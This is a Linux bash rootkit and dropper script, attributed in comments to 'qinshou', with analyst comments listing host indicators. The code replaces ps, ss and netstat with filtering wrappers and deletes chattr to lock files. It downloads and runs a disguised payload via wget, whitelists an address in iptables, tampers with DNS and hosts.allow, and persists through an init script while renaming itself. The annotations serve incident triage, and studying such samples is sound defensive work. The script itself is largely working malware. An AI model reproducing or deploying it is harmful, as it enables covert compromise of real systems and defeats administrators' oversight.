#! /bin/bash
#chkconfig:12345 90 90
#############################################
#############################################
#############################################
#############################################
#############################################
# Analyst note: the assignments below name the on-disk artifacts this script
# creates or touches. Each path is usable as a host indicator during triage.
# `path` and `exit0` are not referenced again in the lines shown.
path=`pwd`
exit0="exit 0"
# Dot-prefixed copies of the genuine ss / ps / netstat binaries.
Fss="/usr/bin/.Fss"
Fps="/usr/bin/.Fps"
Fnet="/usr/bin/.Fnetstat"
# Renamed copy of chattr (created further down); used for every +ia / -ia call.
LockAngel="/usr/bin/zfgsr"
# Second set of copies of the genuine tools, kept under /usr/bin/dpkgd/.
Fssbak="/usr/bin/dpkgd/ss"
Fpsbak="/usr/bin/dpkgd/ps"
Fnetbak="/usr/bin/dpkgd/netstat"
# Downloaded payload and its backup copy, both named to resemble dbus-daemon.
MyFileAngel="/etc/init.d/.dbus-daemon--system"
PuppetAngel="/usr/bin/.dbus-daemon--system.bak"
# Saved copy of /etc/hosts.allow, restored over the live file on every run.
allow="/etc/allow.bak"
# Marker/state file; its second field holds the script's current file name.
Fconfig="/sbin/Fconfig.n"
# Init script written for start-up persistence.
S99="/etc/rc.d/init.d/S99.25000"
# First run only: seed the marker file, then try to set immutable + append-only
# on it. zfgsr may not exist yet at this point; errors are discarded.
if [ ! -f "$Fconfig" ];then
echo byqinshou 995999349 > $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
fi
# Resolve an address into Address1. Later code filters this value out of
# ss/netstat output and whitelists it in iptables.
# NOTE(review): nslookup is shown with no query name; the host appears to have
# been stripped from this listing (the wget URL further down also lacks a host).
# Confirm against the original sample.
Address1=`nslookup |grep "Address: "|awk '{print $2}'`
if [ -z "$Address1" ];then
# Lookup returned nothing: unlock /etc/resolv.conf, overwrite it with two
# public resolvers, backdate its mtime, then re-apply immutable + append-only.
# Triage: lsattr showing i/a on /etc/resolv.conf, or an mtime of
# 2010-06-07 08:10:30, is an indicator of this script having run.
zfgsr -ia /etc/resolv.conf
echo 'nameserver 114.114.114.114'>/etc/resolv.conf
echo 'nameserver 8.8.8.8'>>/etc/resolv.conf
touch -d "2010-06-7 08:10:30" /etc/resolv.conf
zfgsr +ia /etc/resolv.conf
fi
# Name rotation set-up. The marker file's second field is the name this script
# was last saved under; a new 10-hex-character name is derived from the md5 of
# the nanosecond clock on every run.
Ftempbash=`cat $Fconfig | awk '{print $2}'` #current script file name
Fbashtemp="/usr/bin/"$Ftempbash #current script path
Fbashname=`date +%s%N | md5sum | head -c 10`
Fbashpath="/usr/bin/"$Fbashname #new script path
# When started from any path other than the recorded one, kill processes with
# the recorded name and delete both that file and the payload backup copy.
if [ $0 != "$Fbashtemp" ];then
pkill $Ftempbash;killall $Ftempbash
zfgsr -ia /usr/bin/$Ftempbash;rm -f /usr/bin/$Ftempbash
zfgsr -ia $PuppetAngel;rm -f $PuppetAngel
fi
# -------------------------------------------------------------
# Takes over chattr: the genuine /usr/bin/chattr is copied to /usr/bin/zfgsr and
# /usr/bin/.zfgsr, both copies are made world-writable and backdated, and the
# original chattr is deleted. With chattr gone, an administrator has no stock
# tool for clearing the immutable/append-only flags set elsewhere in this script.
# Triage: a missing /usr/bin/chattr, plus mode-777 files named zfgsr / .zfgsr
# with an mtime of 2011-06-07 08:10:30. Use lsattr and a chattr from trusted
# media or a reinstalled package rather than the copies left on the host.
if [ ! -f "$LockAngel" ];then
zfgsr -ia $LockAngel
rm -rf $LockAngel
cp -f /usr/bin/chattr $LockAngel
cp -f /usr/bin/chattr /usr/bin/.zfgsr
cp -f /usr/bin/.zfgsr $LockAngel
chmod 777 $LockAngel
chmod 777 /usr/bin/.zfgsr
touch -d "2011-06-7 08:10:30" $LockAngel
touch -d "2011-06-7 08:10:30" /usr/bin/.zfgsr
rm -rf /usr/bin/chattr
# NOTE(review): this calls `zfgs`, not `zfgsr`; no binary of that name is
# created in the lines shown, and errors are discarded. Verify the actual
# flags on the copy with lsattr rather than assuming they were set.
zfgs +ia $LockAngel >/dev/null 2>&1
fi
# Replaces /usr/sbin/ss with a wrapper. The genuine binary is kept as
# /usr/bin/.Fss (and /usr/bin/dpkgd/ss), and the new /usr/sbin/ss is a three-line
# shell script that runs .Fss and drops every output line containing Address1.
# Address1 is expanded when the wrapper is written, so the filtered address is
# stored literally inside /usr/sbin/ss and can be read back from it.
# The wrapper as written passes no arguments through to .Fss.
# Triage: `file /usr/sbin/ss` reporting a shell script, package verification
# (rpm -V / dpkg --verify) flagging the file, or lsattr showing i/a on it.
if [ -f /usr/sbin/ss ];then
if [ ! -f "$Fss" ];then
if [ ! -f "$Fssbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /usr/sbin/ss $Fssbak
cp -f /usr/sbin/ss $Fss
else
cp -f $Fssbak $Fss
fi
zfgsr -ia /usr/sbin/ss
rm -rf /usr/sbin/ss
echo '#!/bin/sh' > /usr/sbin/ss
echo '.Fss|grep -v "'$Address1'"' >> /usr/sbin/ss
echo 'exit' >> /usr/sbin/ss
chmod 0755 $Fss;chmod 0755 /usr/sbin/ss
# Lock the wrapper and both copies of the genuine binary.
zfgsr +ia /usr/sbin/ss >/dev/null 2>&1
zfgsr +ia $Fssbak >/dev/null 2>&1
zfgsr +ia $Fss >/dev/null 2>&1
fi
fi
# Same substitution for netstat: the genuine binary is kept as
# /usr/bin/.Fnetstat (and /usr/bin/dpkgd/netstat), and /bin/netstat becomes a
# shell wrapper that forwards its arguments to .Fnetstat and removes every line
# containing Address1. The address is baked into the wrapper text at write time.
# Triage: /bin/netstat being a short shell script instead of an ELF binary;
# compare against the distribution package before trusting any copy on the host.
if [ -f /bin/netstat ];then
if [ ! -f "$Fnet" ];then
if [ ! -f "$Fnetbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/netstat $Fnetbak
cp -f /bin/netstat $Fnet
else
cp -f $Fnetbak $Fnet
fi
zfgsr -ia /bin/netstat
rm -rf /bin/netstat
echo '#!/bin/sh' > /bin/netstat
echo 'for arg in "$*";do' >> /bin/netstat
echo '.Fnetstat $arg|grep -v "'$Address1'";done;exit' >> /bin/netstat
chmod 0755 $Fnet;chmod 0755 /bin/netstat
# Lock the wrapper and both copies of the genuine binary.
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia $Fnetbak >/dev/null 2>&1
zfgsr +ia $Fnet >/dev/null 2>&1
fi
fi
# Same substitution for ps: the genuine binary is kept as /usr/bin/.Fps (and
# /usr/bin/dpkgd/ps), and /bin/ps becomes a wrapper that removes lines
# containing ".dbus-daemon--system", the script's current random name, "ps"
# and "grep". The random name is written literally into the wrapper, so
# reading /bin/ps reveals the name the script is currently running under.
# Triage: process listings taken through /bin/ps on such a host are not
# reliable; read /proc directly or use a statically linked tool from trusted media.
if [ -f /bin/ps ];then
if [ ! -f "$Fps" ];then
if [ ! -f "$Fpsbak" ];then
mkdir /usr/bin/dpkgd/
cp -f /bin/ps $Fpsbak
cp -f /bin/ps $Fps
else
cp -f $Fpsbak $Fps
fi
zfgsr -ia /bin/ps
rm -rf /bin/ps
echo '#!/bin/sh' > /bin/ps;echo 'for arg in "$*";do' >> /bin/ps
echo '.Fps $arg|grep -v "'.dbus-daemon--system'"|grep -v "'$Fbashname'"|grep -v "ps"|grep -v "grep";done;exit' >> /bin/ps
chmod 0755 $Fps;chmod 0755 /bin/ps
# Lock the wrapper and both copies of the genuine binary.
zfgsr +ia /bin/ps >/dev/null 2>&1
zfgsr +ia $Fpsbak >/dev/null 2>&1
zfgsr +ia $Fps >/dev/null 2>&1
fi
fi
# Snapshot /etc/hosts.allow once into /etc/allow.bak and lock the snapshot.
# The end of the script copies this snapshot back over the live file on every
# run, so later administrator edits to hosts.allow are reverted.
if [ ! -f "$allow" ];then
cp -f /etc/hosts.allow $allow
zfgsr +ia $allow >/dev/null 2>&1
fi
# by qinshou -----------------------------------------------
# Watchdog: count processes matching ".dbus-daemon--system" using the genuine
# ps copy (.Fps), since the /bin/ps wrapper would hide them.
ExistAngel=`.Fps aux | grep .dbus-daemon--system | grep -v "grep" |wc -l`
# Anything other than exactly one match: restore the payload from its .bak
# copy, run it, then delete the on-disk file once the command returns.
# NOTE(review): if the payload backgrounds itself (not visible here), the
# running process would show a "(deleted)" target in /proc/<pid>/exe.
if [ $ExistAngel != 1 ];then
zfgsr -ia /usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
cp -f /usr/bin/.dbus-daemon--system.bak /usr/bin/.dbus-daemon--system
chmod 777 /usr/bin/.dbus-daemon--system
/usr/bin/.dbus-daemon--system
rm -rf /usr/bin/.dbus-daemon--system
fi
# Payload fetch, run only when /etc/init.d/.dbus-daemon--system is missing.
# wget is unlocked and made executable, used once, then set to mode 0 and
# locked again, which leaves wget unusable for everyone else on the host.
# NOTE(review): the commands here are `zfgs`, not `zfgsr`; no binary named
# zfgs is created in the lines shown. Check real flags with lsattr.
# Triage: /usr/bin/wget with mode 000, and outbound plain-HTTP requests to
# TCP port 999 for /1000.exe in proxy or flow logs.
if [ ! -f "$MyFileAngel" ];then
zfgs -i /usr/bin/wget
zfgs -a /usr/bin/wget
chmod 777 /usr/bin/wget
# NOTE(review): the URL has no host component in this listing; it appears to
# have been removed from the page. The file is fetched with no integrity check.
wget -P /etc/ http://:999/1000.exe
zfgs -i $MyFileAngel
zfgs -a $MyFileAngel
rm -rf $MyFileAngel
chmod 777 /etc/1000.exe
# Rename the download to the dbus-daemon look-alike path and lock it.
mv -f /etc/1000.exe $MyFileAngel
zfgs +i $MyFileAngel
zfgs +a $MyFileAngel
chmod 0 /usr/bin/wget
zfgs +i /usr/bin/wget
zfgs +a /usr/bin/wget
fi
# Keep a second copy of the payload; the watchdog above restores from it.
if [ ! -f "$PuppetAngel" ];then
cp -f $MyFileAngel $PuppetAngel
zfgs +i $PuppetAngel
zfgs +a $PuppetAngel
fi
# Firewall tampering for the resolved address: with no INPUT rule mentioning
# Address1 an ACCEPT rule is inserted at the top of the chain; otherwise a DROP
# rule for that source is deleted.
# Triage: an unexplained `-s <address> -j ACCEPT` rule at the head of INPUT;
# the address matches the one embedded in the ss/netstat wrappers.
iptable=`iptables -L INPUT|grep $Address1|awk '{print $1 $4}'`
if [ -z "$iptable" ];then
iptables -I INPUT -s $Address1 -j ACCEPT
else
iptables -D INPUT -s $Address1 -j DROP
fi
# Auto-start ------------------
# Writes /etc/rc.d/init.d/S99.25000 once, line by line. The generated init
# script carries chkconfig and LSB headers for runlevels 1-5, launches the
# script's new path on "start" and on any unrecognised argument, and does
# nothing on "stop". Variables inside double quotes are expanded at write
# time, so the file contains literal names, not variable references.
# How (or whether) the file is linked into a runlevel is not shown in this listing.
# Triage: presence of /etc/rc.d/init.d/S99.25000, whose description/Provides
# fields hold the script name that was recorded when the file was written.
if [ ! -f "$S99" ];then
echo "#!/bin/sh" >> $S99
echo "# chkconfig: 12345 90 90" >> $S99
echo "# description: $Ftempbash" >> $S99
echo "### BEGIN INIT INFO" >> $S99
echo "# Provides: $Ftempbash" >> $S99
echo "# Required-Start: " >> $S99
echo "# Required-Stop: " >> $S99
echo "# Default-Start: 1 2 3 4 5" >> $S99
echo "# Default-Stop: " >> $S99
echo "# Short-Description: $Ftempbash" >> $S99
echo "### END INIT INFO" >> $S99
echo 'case $1 in' >> $S99
echo "start)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "stop)" >> $S99
echo " ;;" >> $S99
echo "*)" >> $S99
echo " $Fbashpath" >> $S99
echo " ;;" >> $S99
echo "esac" >> $S99
fi
# by qinshou -----------------------------------------------
# Rotation step: unlock the marker file, this script and the target path, then
# replace the previously recorded name in the marker with the new random one.
zfgsr -ia $Fconfig;zfgsr -ia $0;zfgsr -ia $Fbashpath
sed -i "s|$Ftempbash|$Fbashname|" $Fconfig
zfgsr +ia $Fconfig >/dev/null 2>&1
# Copy this script to the new name, delete the running copy, mark the new one executable.
cp -f $0 $Fbashpath;rm -f $0;chmod 0755 $Fbashpath
# by qinshou -----------------------------------------------
# NOTE(review): the backticks execute $S99 (the init script) and grep its
# output; they do not read the file's contents. The body then rewrites the
# recorded name inside the init script and makes it world-writable.
if [ -z "`$S99|grep "$Fbashtemp"`" ]; then
sed -i "s|$Ftempbash|$Fbashname|" $S99
chmod 777 $S99
fi
# by qinshou -----------------------------------------------
# Remove chattr again in case it was reinstalled, and revert /etc/hosts.allow
# to the saved snapshot before locking it.
zfgsr -ia /usr/bin/chattr;rm -f /usr/bin/chattr
zfgsr -ia /etc/hosts.allow;cp -f $allow /etc/hosts.allow;zfgsr +ia /etc/hosts.allow >/dev/null 2>&1
# Relaunch the renamed copy in the background, detached from the terminal.
# Every run therefore ends by starting a new instance under a fresh name; the
# current name is recorded in /sbin/Fconfig.n and in the /bin/ps wrapper.
sleep 1;zfgsr -ia $Fbashpath;chmod 0755 $Fbashpath;nohup $Fbashpath >/dev/null 2>&1 &
# by qinshou -----------------------------------------------
# Update the name filtered by the /bin/ps wrapper to the new one, then re-lock
# both wrappers.
zfgsr -ia /bin/ps;sed -i "s|$Ftempbash|$Fbashname|" /bin/ps
zfgsr -ia /bin/netstat;chmod 0755 /bin/netstat;chmod 0755 /bin/ps
zfgsr +ia /bin/netstat >/dev/null 2>&1
zfgsr +ia /bin/ps >/dev/null 2>&1
# by qinshou -----------------------------------------------
exit